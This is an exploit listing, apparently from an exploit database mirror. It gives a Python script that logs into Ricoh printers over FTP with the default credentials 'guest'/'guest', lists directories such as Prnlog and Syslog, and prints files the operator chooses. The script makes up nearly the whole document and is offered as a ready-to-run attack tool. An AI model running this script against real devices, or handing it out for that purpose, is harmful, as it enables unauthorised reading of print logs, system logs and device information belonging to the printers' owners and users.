Ricoh Printer Exploit, Directory and File Exposure

#Exploit Title: Ricoh Printer Directory and File Exposure
#Date: 9/15/2023
#Exploit Author: Thomas Heverin (Heverin Hacker)
#Vendor Homepage: https://www.ricoh.com/products/printers-and-copiers
#Software Link: https://replit.com/@HeverinHacker/Ricoh-Printer-Directory-and-File-Finder#main.py
#Version: Ricoh Printers - All Versions
#Tested on: Windows
#CVE: N/A

#Directories Found: Help, Info (Printer Information), Prnlog (Print Log), Stat (Statistics) and Syslog (System Log)

from ftplib import FTP

def ftp_connect(ip):
    try:
        ftp = FTP(ip)
        ftp.login("guest", "guest")
        print(f"Connected to {ip} over FTP as 'guest'")
        return ftp
    except Exception as e:
        print(f"Failed to connect to {ip} over FTP: {e}")
        return None

if __name__ == "__main__":
    target_ip = input("Enter the Ricoh Printer IP address: ")

    ftp_connection = ftp_connect(target_ip)
    if ftp_connection:
        try:
            while True:
                file_list = ftp_connection.nlst()
                print("List of Ricoh printer files and directories:")
                for index, item in enumerate(file_list, start=1):
                    print(f"{index}. {item}")

                file_index = int(input("Enter the printer index of the file to read (1-based), or enter 0 to exit: ")) - 1
                if file_index < 0:
                    break

                if 0 <= file_index < len(file_list):
                    selected_file = file_list[file_index]
                    lines = []
                    ftp_connection.retrlines("RETR " + selected_file, lines.append)
                    print(f"Contents of '{selected_file}':")
                    for line in lines:
                        print(line)
                else:
                    print("Invalid file index.")
        except Exception as e:
            print(f"Failed to perform operation: {e}")
        finally:
            ftp_connection.quit()

All rights reserved nPulse.net 2009 - 2024
Powered by: MVCP 2.0-RC / BVCP / ASPF-MILTER / PHP 7.4 / NGINX / FreeBSD